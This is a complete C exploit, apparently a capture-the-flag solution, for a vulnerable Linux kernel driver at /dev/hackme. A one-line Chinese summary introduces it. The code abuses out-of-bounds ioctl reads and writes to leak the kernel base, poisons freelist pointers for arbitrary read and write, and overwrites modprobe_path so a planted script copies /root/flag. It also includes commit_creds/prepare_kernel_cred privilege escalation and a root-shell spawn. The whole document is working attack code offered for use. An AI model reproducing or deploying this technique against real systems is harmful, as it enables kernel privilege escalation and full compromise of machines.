read和write操作可以越界读写,泄露出kernel_base和codbase之后劫持数组指针实现任意地址读写,然后改写modprobe_path
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stropts.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <pthread.h>
#define REQ_CREATE 0x30000
#define REQ_DELETE 0x30001
#define REQ_READ 0x30003
#define REQ_WRITE 0x30002
size_t user_cs, user_ss, user_rflags, user_sp;
size_t commit_creds = 0, prepare_kernel_cred = 0;
size_t vmlinux_base = 0;
struct command {
unsigned int index;
unsigned int unused;
char *buffer;
long size;
long offset;
};
void add(int fd, int id, int size, char *init_buffer) {
struct command command;
command.index = id;
command.buffer = init_buffer;
command.size = size;
ioctl(fd, REQ_CREATE, &command);
}
void fr(int fd, long id) {
struct command command;
command.index = id;
ioctl(fd, REQ_DELETE, &command);
}
void show(int fd, int id, char *dest, int offset, int size) {
struct command command;
command.index = id;
command.size = size;
command.buffer = dest;
command.offset = offset;
ioctl(fd, REQ_READ, &command);
}
void edit(int fd, int id, char *src, int offset, int size) {
struct command command;
command.index = id;
command.size = size;
command.buffer = src;
command.offset = offset;
ioctl(fd, REQ_WRITE, &command);
}
void lg(char *s,size_t addr){
printf("[+]%s ==> 0x%llx\n",s,addr);
}
void error(char *msg) {
printf("[-] %s\n", msg);
exit(-1);
}
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[*]status has been saved.");
}
void get_shell(void){
system("/bin/sh");
}
void get_root()
{
char* (*pkc)(int) = prepare_kernel_cred;
void (*cc)(char*) = commit_creds;
(*cc)((*pkc)(0));
}
void spawn_shell()
{
if(!getuid())
{
puts("Get shell");
system("/bin/sh");
}
else
{
puts("[*]spawn shell error!");
}
exit(0);
}
int exp(){
get_root();
__asm__(
"push user_ss;"
"push user_sp;"
"push user_rflags;"
"push user_cs;"
"push spawn_shell;"
"swapgs;"
"iretq;"
);
}
int main()
{
save_status();
char *addr = malloc(0x1000);
printf("addr: %llx\n",addr);
int fd = open("/dev/hackme",0);
if(fd < 0){
puts("open error");
exit(0);
}
memset(addr,'A',0x10);
printf("%s\n",addr );
add(fd,0,0x100,addr);
add(fd,1,0x100,addr);
add(fd,2,0x100,addr);
add(fd,3,0x100,addr);
add(fd,4,0x100,addr);
add(fd,5,0x100,addr);
show(fd,0,addr,-0x200,0x200);
/*for(unsigned int i = 0;i<0x100;i++){
printf("addr[%d] == %llx\n",i,*(size_t *)(addr+i*8));
}*/
//printf("%llx\n",addr);
size_t kernel_base = *(size_t *)(addr)-0x8472c0;
lg("kernel_base",kernel_base);
size_t codebase = kernel_base+0x811000;
size_t addr2[0x100] = {0};
size_t target = codebase;
addr2[0] = codebase+0x30;
fr(fd,0);
fr(fd,1);
edit(fd,2,addr2,-0x100,0x100);
add(fd,6,0x100,addr);
size_t a1[0x8] = {0};
add(fd,7,0x100,a1);
show(fd,7,addr,0x8,0x10);
show(fd,7,addr,-0x20,0x20);
/*for(unsigned int i = 0;i<0x100;i++){
printf("addr[%d] == %llx\n",i,*(size_t *)(addr+i*8));
}*/
codebase = *(size_t *)(addr)-0x2338;
size_t addrList = codebase+0x2400;
fr(fd,3);
fr(fd,4);
addr2[0] = addrList;
edit(fd,5,addr2,-0x100,0x100);
add(fd,3,0x100,a1);
add(fd,4,0x100,a1);
addr2[0] = 0x83f960+kernel_base;
addr2[1] = 0x100;
char *addr3 = "/home/1.sh\x00";
edit(fd,4,addr2,0x10,0x10);
edit(fd,1,addr3,0,0x10);
system("echo -ne '#!/bin/sh\n/bin/cp /root/flag /home/flag\n/bin/chmod 777 /home/flag' > /home/1.sh");
system("echo -ne '\xff\xff\xff\xff' > /home/aaa");
system("chmod +x /home/1.sh");
system("chmod +x /home/aaa");
system("/home/aaa");
system("cat /home/flag");
//show(fd,0,addr,-0x200,0x200);
